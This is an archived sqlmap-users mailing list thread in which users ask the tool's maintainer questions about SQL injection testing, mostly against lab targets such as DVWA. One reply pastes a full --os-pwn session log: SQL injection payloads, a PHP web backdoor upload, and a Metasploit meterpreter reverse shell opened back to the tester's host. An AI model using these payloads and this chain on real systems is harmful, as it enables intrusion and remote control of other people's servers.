gmane.comp.security.sqlmap

bro i cand run my pc

armen Raja — 2016-04-26T01:47:45

hi bro i cand run my pc python sqlmap.py so pls helpe me now
------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: inverting --string and --not-string

Miroslav Stampar — 2016-04-23T14:43:46

Changed wiki pages for --string to:
...which should be present on original page (though it is not a
requirement)...

Bye

On Sat, Apr 23, 2016 at 4:40 PM, Miroslav Stampar <
miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

Re: inverting --string and --not-string

Miroslav Stampar — 2016-04-23T14:40:21

Just checked.

sqlmap only warns that there is no --string in original response. So, I
just need to change the wiki pages accordingly

Bye

On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar <
miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

Re: inverting --string and --not-string

Miroslav Stampar — 2016-04-22T15:42:23

Ok. This makes way more sense :). Now commuting. Will check current status
now (will drop checking in original if it is the case now).

Bye
On Apr 22, 2016 5:39 PM, "Tim Maletic" <tmaletic-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: inverting --string and --not-string

Miroslav Stampar — 2016-04-22T15:43:42

p.s. "Will check current status now" -> "Will check current status later
today"
On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: inverting --string and --not-string

Tim Maletic — 2016-04-22T15:39:09

Let me try to put this another way.  According to the usage doc:

"Sometimes it may fail, that is why the user can provide a string (--string
option) which is always present on original page and on all True injected
query pages, but that it is not on the False ones."

Is there a way to invert this logic so that "--string" works for strings
that are present on original page and all *true* ones?

On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: inverting --string and --not-string

Miroslav Stampar — 2016-04-22T15:20:55

This doesn't make any sense. With --string either there is a string (TRUE)
or there isn't (FALSE). In case of --not-string it's the complete opposite.

You are asking for 4 states: 1) with string and not-string; 2) with string
and no not-string; 3) without string and with not-string; and 4) without
string and without not-string

Please reconsider your whole use-case.

Bye

On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tmaletic-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

inverting --string and --not-string

Tim Maletic — 2016-04-22T14:23:22

I'm testing a system where no injection and false injections produce page
A, but true injections produce page B.

sqlmap doesn't support setting both --string and --not-string, and these
options assume the opposite of the above, so I don't see a way to handle
this unusual situation.

Suggestions?
Thanks!
-tm
------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: mysql os-pwn options on windows

Miroslav Stampar — 2016-04-22T07:17:05

In your case, problem is the --tmp-path. Have you manually set it to
"/tmp"? If so, it is wrongly set to a linux path while you should put it to
a remote (Windows) location (...--tmp-path=TMPPATH  Remote absolute path of
temporary files directory)

Bye

On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <
miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org> wrote:

Re: mysql os-pwn options on windows

Miroslav Stampar — 2016-04-22T07:13:52

$ sudo python sqlmap.py -u "
http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
[sudo] password for stamparm:
         _
 ___ ___| |_____ ___ ___  {1.0.4.21#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 09:11:45

[09:11:45] [WARNING] you did not provide the local path where Metasploit
Framework is installed
[09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
installation inside the environment path(s)
[09:11:45] [INFO] Metasploit Framework has been found installed in the
'/usr/bin' path
[09:11:45] [INFO] resuming back-end DBMS 'mysql'
[09:11:45] [INFO] testing connection to the target URL
[09:11:45] [INFO] heuristics detected web page charset 'ascii'
[09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2546=2546

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
    Payload: id=1 AND (SELECT 8079 FROM(SELECT
COUNT(*),CONCAT(0x7178767071,(SELECT
(ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT
NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
epjZ
---
[09:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[09:11:45] [INFO] fingerprinting the back-end DBMS operating system
[09:11:45] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
[09:11:46] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
[09:11:47] [WARNING] unable to retrieve automatically the web server
document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
[09:12:02] [WARNING] unable to automatically parse any web server path
[09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
LIMIT 'LINES TERMINATED BY' method
[09:12:02] [INFO] the file stager has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
[09:12:02] [INFO] the backdoor has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
[09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
what is the local address? [Enter for '192.168.146.1' (detected)]
which local port number do you want to use? [59643]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
[09:12:04] [INFO] creation in progress ..... done
[09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe'
[09:12:09] [INFO] shellcodeexec successfully uploaded
[09:12:09] [INFO] running Metasploit Framework command line interface
locally, please wait..

 ______________________________________________________________________________
|
   |
|                   METASPLOIT CYBER MISSILE COMMAND V4
   |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /
 x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __
 ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \
 ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH
FFFFFFFF #
################################################################################

http://metasploit.pro


       =[ metasploit v4.11.8-dev-a030179                  ]
+ -- --=[ 1527 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 59643
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:59643
[*] Starting the payload handler...
[09:12:18] [INFO] running Metasploit Framework shellcode remotely via
shellcodeexec, please wait..
[09:12:23] [WARNING] turning off pre-connect mechanism because of
connection time out(s)
[*] Sending stage (957487 bytes) to 192.168.146.132

meterpreter >


On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <netzerospace-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

mysql os-pwn options on windows

Indra Zulkarnain — 2016-04-22T04:56:24

hi all,

i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
windows machine"

i got an error

[WARNING] unable to upload the file through the web file stager to '/tmp'

i wonder is it only avaliable for linux OS ?

thanks
Indra Z

Re: display stored procedure with sqlmap

Indra Zulkarnain — 2016-04-08T07:22:26

it works..
thanks bro
On Apr 8, 2016 2:15 PM, "Miroslav Stampar" <miroslav.stampar-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: display stored procedure with sqlmap

Miroslav Stampar — 2016-04-08T07:15:02

You should use queries in --sql-query. sp_helptext is a T-SQL procedure to
display the definition (-> can't be used in queries)

For your case you could take a look into something like:
http://stackoverflow.com/a/26884231 (<- OBJECT_DEFINITION)

Bye

On Thu, Apr 7, 2016 at 9:33 PM, Indra Zulkarnain <netzerospace-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

display stored procedure with sqlmap

Indra Zulkarnain — 2016-04-07T19:33:38

hi all

i just wondering how do i display a stored procedure with sqlmap help
can i do that with --query sp_helptext ?

thanks
Net

Re: boolean based sqli

Miroslav Stampar — 2016-03-14T16:26:43

Hardly will sqlmap give all the correct payloads right away.

Though, to recreate sessions you could take a look into the:

    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL

With "safe URL" mechanism you could visit the "session recreation" page at
every <freq> times. sqlmap should take the new session cookie at every
visit.

Bye

On Mon, Mar 14, 2016 at 5:10 PM, Marcell Fodor <fodor.email-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

boolean based sqli

Marcell Fodor — 2016-03-14T16:10:24

Hi,

I have an application where the injection is pretty straightforward:

?asd= (case when(123=123 *) then 1 else 2 end)

Problem is, when Sqlmap tries the injection point, it sends query which
results in incorrect syntax on the server side and crashes the session. I
can make the it working by Burp Marcos, recreating the session prior all
sqlmap test requests, and sqlmap will find the injection point working
after a few tries.

Is there a more elegant way to do this?
------------------------------------------------------------------------------
Transform Data into Opportunity.
Accelerate data analysis in your applications with
Intel Data Analytics Acceleration Library.
Click to learn more.
http://pubads.g.doubleclick.net/gampad/clk?id=278785231&iu=/4140_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

enable xp_cmdshell with sqlmap

Yonatan — 2016-03-06T19:40:01

as enabling xp_cmdshell with sqlmap?
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [ERROR] possible integer casting detected

Miroslav Stampar — 2016-02-22T16:42:58

sqlmap says that integer casting is probable, hence to not expect SQLi
findings. Integer casting is an usual way how to fight SQLi.

Bye
On Feb 22, 2016 16:40, "aurel labroue" <labroue.aurel-Qt13gs6zZMY< at >public.gmane.org> wrote:

------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=272487151&iu=/4140_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[ERROR] possible integer casting detected

aurel labroue — 2016-02-22T15:37:09

Hi,I'm trying to run nmap on the Blind SQL challenge from DVWA website (lvl low), and i get this error that i don't understand: 

                    [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST['id'])") at the back-end web application


Cheers

N.B: i'm running nmap on Kali 2.0 on a virtual Machine and Metasploitable (where DVWA is installed) also on a virtual machine and same computer.


------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=272487151&iu=/4140_______________________________________________
sqlmap-users mailing list
sqlmap-users-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f< at >public.gmane.org
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: postgresql fingerprint incompatible library “/tmp/libsxqfo.so”: version mismatch

Miroslav Stampar — 2016-01-26T06:33:24

Please update to the latest revision and retry. It should be fixed now.

Bye

On Mon, Jan 25, 2016 at 4:22 PM, David Martinez <davidmpoyatos-Re5JQEeQqe8AvxtiuMwx3w< at >public.gmane.org>
wrote:

postgresql fingerprint incompatible library “/tmp/libsxqfo.so”: version mismatch

David Martinez — 2016-01-25T15:22:06

Hello,

Exploiting the machine CsharpVulnJson from vulnhub:
https://www.vulnhub.com/entry/csharp-vulnjson,134

I found and error when sqlmap fingerprint postgresql.

Sqlmap always detect 9.1 when the real version is 9.3.9. This causes
that when sqlmap create sys_eval, sys_exec functions the server answer
with the error: incompatible library “/tmp/libsxqfo.so”: version
mismatch

If I copy the udf lib from 9.3 directory to 9.1 it works fine.

I tried to modify fingeprint.py adding the 9.3 version new function
array_remove like this:

            if inject.checkBooleanExpression("ARRAY[1]=array_remove(ARRAY[1,2],
2)"):
                Backend.setVersion(">= 9.3.0")
            elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
                Backend.setVersionList([">= 9.1.0", "< 9.3.0"])

But no lucky. If I erase the line that check 9.1 when create the
sys_exec function also take the 9.1 udf lib.

I don't know how to proceed.


Best regards.

------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=267308311&iu=/4140
_______________________________________________
sqlmap-users mailing list
sqlmap-users< at >lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users